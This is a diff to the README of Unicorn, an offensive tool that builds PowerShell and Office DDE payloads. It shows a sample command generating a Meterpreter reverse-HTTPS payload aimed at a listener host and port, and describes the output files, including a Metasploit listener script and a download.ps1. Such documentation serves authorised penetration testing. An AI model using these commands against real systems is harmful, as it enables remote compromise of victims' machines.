trustedsec/unicorn/README.md

 python unicorn.py <payload> <lhost> <lport> dde python unicorn.py windows/meterpreter/reverse_https 192.168.5.5 443 dde

-Once generated, a powershell_attacks.txt will be generated which contains the Office code, and the unicorn.rc file which is the listener component which can be called by msfconsole -r unicorn.rc to handle the listener for the payload.
+Once generated, a powershell_attack.txt will be generated which contains the Office code, and the unicorn.rc file which is the listener component which can be called by msfconsole -r unicorn.rc to handle the listener for the payload.
+In addition a download.ps1 will be exported as well (explained in the latter section).

 In order to apply the payload, as an example (from sensepost article):